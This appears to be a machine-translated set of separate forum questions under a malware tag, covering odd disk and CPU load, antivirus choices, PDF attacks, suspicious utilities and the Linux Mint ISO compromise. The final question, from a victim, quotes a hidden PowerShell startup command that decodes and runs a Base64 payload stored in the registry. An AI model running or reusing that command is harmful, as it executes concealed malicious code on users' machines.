标签: malware

在过去的一个月（可能更多）中，我注意到我的笔记本电脑（运行 Windows 10）经常变得几乎无法使用，特别是在很多天没有打开它之后。

我注意到任务管理器中的磁盘使用率在很长一段时间内处于 100%，但这很荒谬，因为即使是所有进程的总和 [我可以看到...] 也只能接近 5-10% 左右慷慨的情况下。

这是一台开发机，拥有8GB RAM，i7处理器，空间充足。除了 MS 默认程序之外，几乎没有启动程序（即使在那里，我也从启动列表中剔除了大部分非必需程序）。我还逐步禁用了 BITS、Superfetch 等服务，但没有看到明显的效果。

更可疑的是它发生的模式——在计算机物理断开连接和关闭多天后启动时问题最严重。启动时间约为 3-5 分钟 (!)，之后磁盘以 100% 使用率运行几分钟，然后无缘无故地突然下降到 1-5% 左右。所有这一切都没有显示任何接近完全磁盘使用的进程。

经过大约一个月的调查后，我开始怀疑涉及恶意软件，特别是因为任务管理器中的差异，但也因为问题如何突然自行纠正。我还应该注意到，计算机运行 AVG 免费版，并且计算机和反 rootkit 的扫描结果都是干净的。话虽这么说，我想探究这可能是恶意软件连接和更新自身的可能性，或者更糟糕的是，窃取数据[或者更糟糕的是，咀嚼我的磁盘来加密我的文件，同时告诉我一切都好]？

目前，我没有观察到支持渗透理论的不规则网络流量，但是也可以使用流氓驱动程序向任务管理器/wireshark隐藏这一点。

我有很多问题：

1. 这种行为模式是否符合任何已知的恶意软件/APT 威胁？
2. 假设我要继续进入取证方向，可以采取哪些进一步步骤来调查和验证机器上的驱动程序？
3. 除了任务管理器之外，我还可以采取哪些步骤来监视和识别实际导致 100% 磁盘使用率的进程？
4. 是否有任何合法/Windows 原因可能会发生这种情况？如果是，我如何缩小并隔离有问题的组件？

我来这里是因为我有问题。在我打开任务管理器之前，我的 CPU 一直以 100% 的速度工作（当我空闲时）。当我打开任务管理器时，它显示我的 CPU 处于 100% 状态，半秒后它急剧下降到 15%，这是我在电脑上什么都不做时的正常使用情况。有谁知道会发生什么？另外，我的任务管理器在使用几分钟后会自动关闭，因此当它关闭时，我的 CPU 百分比会恢复到 100%。当 CPU 利用率为 100% 时，我在 PC 上工作没有问题。看起来这个后台进程总是给我留下足够的资源，这样我就可以在电脑上做任何我想做的事情，而不会注意到后台正在发生什么事情。我试图在互联网上寻找答案，但找不到。

我可以给你的提示：

1. 这不是我的 CPU 的问题，因为我已经用另一个 CPU 尝试过我的电脑，但仍然发生这种情况。

2. 我在某处读到，我的 CPU 实际上并未达到 100% 的使用率，当我运行任务管理器直到加载真实的 CPU 使用率时，它只是显示几秒钟，但事实并非如此。我在第三方应用程序上监控我的 CPU 负载，它不断显示 100% CPU 使用率，直到我打开任务管理器。然后当然就下降了。我还注意到，当我的任务管理器未打开时，我的 CPU 温度更高，这证明了我所说的。

3. 我认为占用所有 CPU 使用百分比的进程称为“系统中断”或类似的名称。真的很难看到这一点，因为当我打开任务管理器时，这个进程立即关闭，但我可以看到它，因为它在那里呆了大约 1 秒钟。

4. 我遇到这个问题已经有一段时间了，我想在我重新安装 Windows 后也会出现这种情况。我对此不是100%确定。正如我所说，我不记得了，但请注意这可能是一种可能性。

如果有人能帮助我，我将不胜感激。

PS不要告诉我重新安装系统，当然如果我找不到其他解决方案我会尝试

我主要使用免费的安全解决方案来保护我的家用电脑，但我想知道我是否会从付费解决方案中获得更好的保护。

我更喜欢免费软件，因为我可以有多个应用程序来抵御不同的威胁。

对于付费软件，我觉得我只能选择一种，并希望它可以抵御一切。

当有免费选项时，是否值得为安全付费？

可能的重复：
如果我的计算机感染了病毒或恶意软件怎么办？

清除感染了间谍软件、病毒和恶意软件的多个帐户的计算机的最佳方法是什么？您是否应该安装并运行软件来消除每个帐户上的感染？如果您在一个帐户上安装该软件，它会清除包括每个帐户在内的整个计算机吗？

例如，像 CCleaner 这样的一些程序只会安装在一个帐户上，而不为所有用户（帐户）提供选项。这是否意味着该程序将清理包括其他帐户在内的整个计算机，还是我必须在每个帐户上安装 CCleaner 才能清理每个用户的帐户？

我听说过使用 Adob​​e Acrobat 和 Foxit Reader 在 Windows 上使用 PDF 文件的攻击。

在 KDE 或 Gnome 甚至 xpdf 中使用默认 PDF 查看器时，Linux 是否容易受到这些攻击？什么是好的 PDF 扫描仪，可以确定 PDF 文件是否邪恶？

我在我父母的笔记本电脑上找到了一个名为 PC TuneUp Maestro 的桌面图标。谷歌搜索它会产生一页又一页的免费软件下载站点，但我找不到任何合法地确认或清除它的恶意软件状态。默认情况下，我不信任这些程序，但 Microsoft Security Essentials 似乎认为它是合法的。有谁知道这个程序是什么，是否有任何秘密？我可以卸载它还是将整个操作系统安装注销为受污染？

系统hosts文件是完整的（也没有有趣的 unicode 相似之处），因此至少没有引发危险信号。

XP3。

我需要重新安装恶意软件字节，但是当我这样做时它仍然不起作用，因为某些文件没有被删除。

我能做什么？

编辑：让 Malwarebytes 回来真是太好了！谢谢。

当我启动我的桌面时，它给了我一个关于BackgroundContainer.dll.

如何摆脱它？

当我启动 regedit.exe 并搜索（F3或CTRL+ F）BackgroundContainer.dll时，我什么也没找到

根据Linux Mint 的博客文章：

linux-mint 网站被黑，部分 ISO 被替换为后门操作系统。

我正在安装几周前的操作系统。如何检查我的操作系统是否存在漏洞？

如果我更新我的系统，它是否有可能被感染？

几天前我在任务管理器中注意到我有一个 powershell.exe 进程正在运行。当我去 msconfig 它有一个非常长的命令。这里是：

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)));

这真的很奇怪，因为就在今天，我之前遇到过问题的一个随机进程出现了（也许它与此无关，只是说）这是一种病毒，并试图在我的 PC 上下载不安全的驱动程序，正如 Windows 所说的那样。谁能告诉我有关此 PowerShell 进程的信息？它在启动时启动并且一直在运行。再一次，我希望我没有听起来很无知，也许这只是一个正常的启动过程。